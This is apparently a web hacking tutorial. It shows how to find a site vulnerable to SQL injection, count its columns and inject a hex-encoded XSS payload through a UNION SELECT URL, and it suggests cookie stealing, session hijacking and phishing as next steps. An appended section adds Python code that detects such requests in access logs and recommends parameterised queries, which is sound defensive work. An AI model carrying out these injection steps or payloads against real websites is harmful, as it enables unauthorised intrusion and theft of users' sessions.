- This is pretty simple! We just have to inject our JavaScript code into the website.
Step 1: First we have to find a site with a SQL injection (SQLi) vulnerability.
Like this:
http://www.site.in/index.php?id=3
Step 2: Finding the number of columns on the site using ORDER BY method.
- Suppose our site has 9 columns!
Step 3: Finding the Vulnerable column using UNION ALL SELECT methods.
- And the most vulnerable column is 3!
Step 4: Now we will inject our XSS payload into it. To make things simple we will encode our payload into hex.
Our XSS injection Payload
<img src=x onerror=confirm(/XSS/)>
Our Hex Encoded Payload
Step 5: Injecting The Payload Into Our Site!
Like This:
http://site.com/index.php?id=-3' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4,5,6,7,8,9--+
NOTE:
The above URL will output our XSS payload into the website. This is a basic XSS payload; now we are free to do other things using XSS, like cookie stealing, XSS phishing, XSS iframe phishing, chained XSS, session hijacking, CSRF attacks, XSS DDoS and other attacks.
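From the defender's side, the request in Step 5 leaves a distinctive trace in access logs: a UNION SELECT whose hex literal decodes to HTML markup. The following is an added example, not part of the original tutorial, that flags such requests; the sample log URLs are constructed from the page's URLs and the `color` parameter is hypothetical.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# MySQL-style hex literal: 0x followed by at least four byte pairs.
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2}){4,})")
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)
# Markup that has no business inside a numeric id parameter.
MARKUP = re.compile(r"<\s*\w+[^>]*>|\bon\w+\s*=|javascript:", re.IGNORECASE)


def decode_hex_literals(text):
    """Decode every 0x... literal in text to a string (latin-1 never fails)."""
    return [bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_LITERAL.finditer(text)]


def inspect_request(url):
    """Return findings for one logged request URL."""
    query = unquote_plus(urlsplit(url).query)
    return {
        "union_select": bool(UNION_SELECT.search(query)),
        # Keep only decoded literals that contain tags or event handlers.
        "hex_markup": [d for d in decode_hex_literals(query) if MARKUP.search(d)],
    }


def is_suspicious(url):
    """True if the request shows UNION-based injection or hex-encoded markup."""
    findings = inspect_request(url)
    return findings["union_select"] or bool(findings["hex_markup"])


# Constructed sample log entries: a normal request, the request from Step 5,
# and a benign request that carries a hex value (hypothetical parameter).
SAMPLE_REQUESTS = [
    "http://site.com/index.php?id=3",
    "http://site.com/index.php?id=-3' union select 1,2,"
    "0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,"
    "4,5,6,7,8,9--+",
    "http://site.com/index.php?id=3&color=0xff00ff00",
]

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        print(is_suspicious(url), inspect_request(url)["hex_markup"], url[:50])
```

Detection is only a backstop: the underlying fix is to bind `id` as a query parameter and to HTML-encode database values when rendering them.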